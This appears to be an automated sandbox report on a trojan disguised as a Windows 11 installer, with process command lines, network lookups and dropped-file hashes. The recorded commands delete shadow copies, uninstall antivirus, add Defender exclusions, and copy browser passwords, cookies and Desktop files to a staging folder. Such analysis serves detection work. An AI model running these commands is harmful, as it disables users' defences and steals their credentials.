vssadmin dELETe shadOws /aLl /QuIEt
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\attrib.exe
aTTrIb +S +H C:\TMP
C:\Windows\system32\find.exe
find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="ESET Security" call uninstall /nointeractive
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip
C:\Windows\SysWOW64\curl.exe
CUrL -S ipINFO.io/Ip
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\otu1nf8f1aiuixcc240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\t9h98yemuyztdw240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\daa28abfmq5240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\tj1lvkk7k240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\eyoc8n14idxv240662078.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\5b3nneef5a1240677406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\8l46la0gojeru240677406.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\ohs8a31fx4mtk240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\61mtomzkbt02ht1240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\qtc9j1wbnrqd240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\4l3szsqpghx240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\s0g722c9e4j4ta1w240699406.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ru85pw6tqsjob9j240705343.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\kbvc7t58g7u3ky240705343.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\eh3f6tu9lk240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\ntt3qcho6f240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\xrk0ql2wlekasq240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\1l01qph8240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\glwg4n1s240710578.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\3hcz52mjwq240719546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\y88z1j32vusu172m240719546.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\8yuq9a72u6m1wcn240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\t4z4yu15iu595z240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\5koqj2nxry240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\58tds0jd240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\rz2ryztw8p3240728109.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\22zcsr95n0240734140.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\613ouc67y2mn36240734140.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\i9ovez9w3s3240740437.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\44a6tcmrfbdc5240740437.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\0mp2sm4y240740531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\8fkndkl8m240740531.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\yaz0qkm4r81lkx240754171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\gu51pkiwl2r9240754171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\6t7u44zsw7k4i99240754265.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\ku2vwbo3c33240754265.tmp\" -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\BlockUse.temp\" \"C:\Users\Admin\AppData\Local\Temp\fmxfkx2joq6ublbyu8yv.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CheckpointEnter.hta\" \"C:\Users\Admin\AppData\Local\Temp\g8hku1jq3xo4li210huykb.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressConfirm.aiff\" \"C:\Users\Admin\AppData\Local\Temp\f06htrgpgf0ohtgj5rgy3k.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ConvertMerge.vsd\" \"C:\Users\Admin\AppData\Local\Temp\6l9b9kap2qesbbxrepr.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisableExport.rm\" \"C:\Users\Admin\AppData\Local\Temp\qijdw58b9daul52l035mwzlma61m1pkx.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\EnableHide.clr\" \"C:\Users\Admin\AppData\Local\Temp\a4e9fv6a6tsuzj1ik.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\EnterInitialize.vbe\" \"C:\Users\Admin\AppData\Local\Temp\vuqevmn7ikzd8qgl0cqknqdifrro5.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\FindSplit.emz\" \"C:\Users\Admin\AppData\Local\Temp\6qtn8jrhn2szxgf4x0flac5t5c.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\LimitSubmit.docx\" \"C:\Users\Admin\AppData\Local\Temp\2qj9ludo0g3451xxnp7mveo5c8e.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\MeasureReceive.txt\" \"C:\Users\Admin\AppData\Local\Temp\2608x592qgmq9o0b8k4.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ReadHide.jtx\" \"C:\Users\Admin\AppData\Local\Temp\d2i01njhgda6z0ft9.tmp\" -Force"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | evcs-ocsp.ws.symantec.com | udp |
| US | 8.8.8.8:53 | ipINFO.io | udp |
| US | 34.117.59.81:80 | ipINFO.io | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| DE | 152.199.19.74:80 | evcs-ocsp.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | evcs-crl.ws.symantec.com | udp |
| SE | 192.229.221.95:80 | evcs-crl.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| SE | 192.229.221.95:80 | evcs-crl.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | 154.141.79.40.in-addr.arpa | udp |
Files
memory/4544-2-0x0000000000401000-0x00000000004B7000-memory.dmp
memory/4544-0-0x0000000000400000-0x00000000004E3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp
| MD5 | 40627c5fe58bb5a60606e5be621af052 |
| SHA1 | c21ec14767478d0e4bd1184ad6c2c280e2d1342f |
| SHA256 | bd4cbba2f23b512fad5b0c84d2e9502e4bfea75cac78482d22036968e8224b42 |
| SHA512 | e418ed7c9768a4237622be7a53b761a45ca4d4cf37643fcfdf9cb2f200a95fc904b213fb1a37befb86e6ff93ae3c5ff0f39243305789236d4031e017ec99085d |
memory/944-6-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2388-11-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/944-12-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2388-9-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/4544-14-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/4104-19-0x0000000000400000-0x000000000071D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe
| MD5 | 78c269b72f5b1d9bd4654cef3fb4a986 |
| SHA1 | c44db702175e2d474e3221a0de14f01c1f35129b |
| SHA256 | ace03b12b8763bd8567425f288ded8f8f0d9acd62f81de17414bd300d21820ab |
| SHA512 | bc9abf69debc967df59e16491ec533ab59b997d8ea89d7ebc1ba0a04b319d5f3746cd9e22b8b2c10b4ce655fb5a813be08214e142e97107cb07222f7dc19bee5 |
memory/4212-185-0x00000000009F0000-0x0000000000A16000-memory.dmp
C:\tmp\.vbs
| MD5 | 2e2fa9827b9d476133f122be9012408c |
| SHA1 | 3a3d0d1135f95227693a46a110312a3c1a177c51 |
| SHA256 | 184fb09c2a02a1e5d23c9abe64affd866a919b7b287622069371716223f3b1b6 |
| SHA512 | 2e4a431fca5dada81cb22af865b122635b9b93e89b3948e86a2d6dd0c4b8eadbcf594ea1fb817818738468a831ecac75d7247d226d4ce901a9aaec66bc2c0e89 |
C:\tmp\.cmd
| MD5 | dee7acbdbf3f448057dae93e28514690 |
| SHA1 | ae56d802230bc13e7663be388781d7d1aa1ef3d0 |
| SHA256 | 5ec9a6efe3c3451a967335bf7d7bcb2f916fc8ba81c0b1118018d079fbffb5ec |
| SHA512 | 77cdd3ab66e49267907e3711ab7878469976ba677a683bead7d5e63353b03164345aef0ca0dd5d124488eca7cfef1f64ebde363d76596ef882cb2c56e1f41504 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
| MD5 | c223a35366076d73ab31526be380631d |
| SHA1 | 5b8ba5941058637a11d271a2ba43f679717f62cc |
| SHA256 | 909ee3e3d9d9aee194ccf9401f21a5e6fa986845b657ce76dd10800f94a3b353 |
| SHA512 | 4d31081138dc079f7382bdd197be3088d2210870ee29574af146b3ebab55f197a1dea8cc6c0ef0184c7de6e13838a0cdf3d947d17cb521cbcce2d64c0b8bd359 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 3d19ae65bc53c6aa833b82ca7fa61cd4 |
| SHA1 | a3b94891864abdc9a8fec3022b3df060923ead46 |
| SHA256 | fcdc3e57b51ed726d90fca4aa19ba09e2bdb7a04fd573bf854465883aa326e14 |
| SHA512 | 8e4e3b8efa9d05497a27e79b82238bd9864ce3e1226ade8358491697173e19f6a12f2f181c64b481cd211ec5231804e9c683d72e5d0cf74208b7adb7a80f6e9c |
C:\Windows\system32\drivers\etc\hosts
| MD5 | aba235b54047e7cb084612bb4da90487 |
| SHA1 | d82ce896f26da05719a159028c18a275ff7304c7 |
| SHA256 | d1437a37ed2e78fe4c82174a1981631a4710f023b4726f7431f7f3a02e209be0 |
| SHA512 | ee997aa717057b01d7ee0aaaddc05925caf4fc7a99f917c7a3b8ee472b926523501cdf26c1315b38463b368a329ec8f1bb47a22f07883b85bd183bbc39d7a7d9 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 1da12c8dc6dee2cf35786d7214c7c5cd |
| SHA1 | fe81b4162636a4f8ccc16d7ad8dd3e5c8165bc63 |
| SHA256 | 18396e55e85d07cc36c223bf7f30e3e2e2cb171e89313b622a6df041f1095333 |
| SHA512 | b465e1c2b1bd4ceb0a2f195c0666c6d4c3ec4b55131be652bfbdee8dff8c9b4f6f52b95ab7562b5ff669dd43e03996453563fc8a3a04ad9f33d141c1bf19f180 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | dae09e71a424a796e57972976432802e |
| SHA1 | 3190c52ba6422c5421f53b12d016cbaeaeafc14e |
| SHA256 | f89d667e7c4a1a85bba63ac8fb4eb4d55d442a323011f222d39b92308b4ecb62 |
| SHA512 | e96a6d8645ec1ea926d154c6ccb1ef6bf172e74a2301624d9de84200bb4c0d7fbe0404b7a0d362c9e1151889d18576bf1c17007b4260cf4b60d018b5506e0f7c |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 6193636e0937f9aa8d1a51760700fe36 |
| SHA1 | 0f31660fd9f0181c977d392c1af12d9ff4295f3b |
| SHA256 | a073d240b848ae572360eeb4a59493078121dd38e827152bb60b44b9b88d4000 |
| SHA512 | 899572343acb5a95fcca3325e6b0db1eaa759c8bfe05556cb1d6b3da7498c6e46e91d5a31dae067aaafeb37f776f601efe69481c1125cf1db57cd80d6034d544 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 9845dd85124401f5a66f558a8aca99b0 |
| SHA1 | bd1e578ff26e1f8ceac98a8e334cab116358ff1b |
| SHA256 | bd67f1c4cbd53fab37860e3039eb9f0d36f8d3d699c012ed73e0103300073eef |
| SHA512 | f6141adc9e43ea3fb70e63c38be2c5f49c7d68dd2121a5ff866665429cc78fbc11e6df9c9766901d3f6bdf7fa2dde43af6e46bf364fd9740d80268fdf59df33f |
C:\Windows\system32\drivers\etc\hosts
| MD5 | a61ea7aef83b5cf13a79f3261b754299 |
| SHA1 | 1b145d66880360213d9ebf1593aeb9146711500b |
| SHA256 | fc9d51689428140dd4cee3c9d5e7a85dbe2d38f8cbb182a453258de4866b533b |
| SHA512 | 3c73458b4532ccabf3996923d3d825626b5505b8f180e727d86fd7667b844e4022eced25c20507262182113d550f21a2b0f6d5acf2896a37e9ee894495ed33a4 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 65b958df30a0d5264a6960b43d1ba803 |
| SHA1 | c5486386da0209c11d769be8db9a250cf91761a9 |
| SHA256 | f1d5f0d18e1caea663ebd7a953904bf783ae1eaafa25f7a0fbec1a36d47eb55a |
| SHA512 | 7845885e7c2d57f44f61daaec63b33fec69c6e712b79286fd33a295a2408813c48d68d7bc70ed144f87e30644b3e214eaaaa1ebb9e70a0af2c509c5d6cfe269d |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 93c55af47cde7b357a50adeafa4b7e0b |
| SHA1 | afff2bdbe8b05cd4aa3a93062673d8798e474d7b |
| SHA256 | f21a0e37e0d2ba27fdf62153e591f51cb40aa78007c4f86b38ed116bd4cb70a2 |
| SHA512 | f407b6d54fbe6afc119d0fcecf1201ad785ee05f3c791150343f0cefbffec8b92b34f371ebb6b5d8d0e47b0ff3a6ad51dcf150d6ce6bb77eaef9c481a5fb1226 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 30153c993d05eba1f074f5426d06d6b6 |
| SHA1 | 6111f38cff97f5f315c84929030e16d5e8895c4c |
| SHA256 | 0da79bd7b13e8ede21f933b07dc131f5c6660c6dea05abd213c5210639b53527 |
| SHA512 | 23a262bf715090bf0011cc4a3eb859ed21ab1fd792b6d39ae0c29892afce3acacfae2be9aa3e1df0006def44d6b3fd2bd5755807e58efc819f29ef2cfdf8ab42 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 37266ef3483bf46b93fe8bd1b5ef0be0 |
| SHA1 | 5523aeeaef268f04d5e28ba2333395835078b9e2 |
| SHA256 | a7958ee25a7cb12da3b75b0f1108d3d8063d373846d5ec4a1d793b696a568ddb |
| SHA512 | ee3c1971740413c0a123c437b6ffaaa45c2bc487064f3f79a3a74f0e9118e66ed7d8b5e93dcf6a0656c3721dec217b7122f71d0c7663a1ee28943b3f2fe11675 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | a57c2edf507991d9b7841950d5ba13ae |
| SHA1 | 73d3e83fb0416098737586205071e449e170bfa9 |
| SHA256 | 536825f9edd7ab2a8bac641368ce3f6e7e69d5f10c606a5ec83db824b72e51b3 |
| SHA512 | 224081bf959a0f3182782581e4872000512d06633ad9026f69c88183d426055e62ac28ca97513ee00e4144144f1f7bfd3f4add8fe720031b2f7ecb68a5ee8d77 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | ceffd1a4bd82dfd9ffcab66c348da323 |
| SHA1 | bfabe81531cadb591370eb6eaa5ade0ec8974e0c |
| SHA256 | 16108ca4ccf2d9b1f45e7eac33aa422200997465c8dac3ec8f8347aec5c51dde |
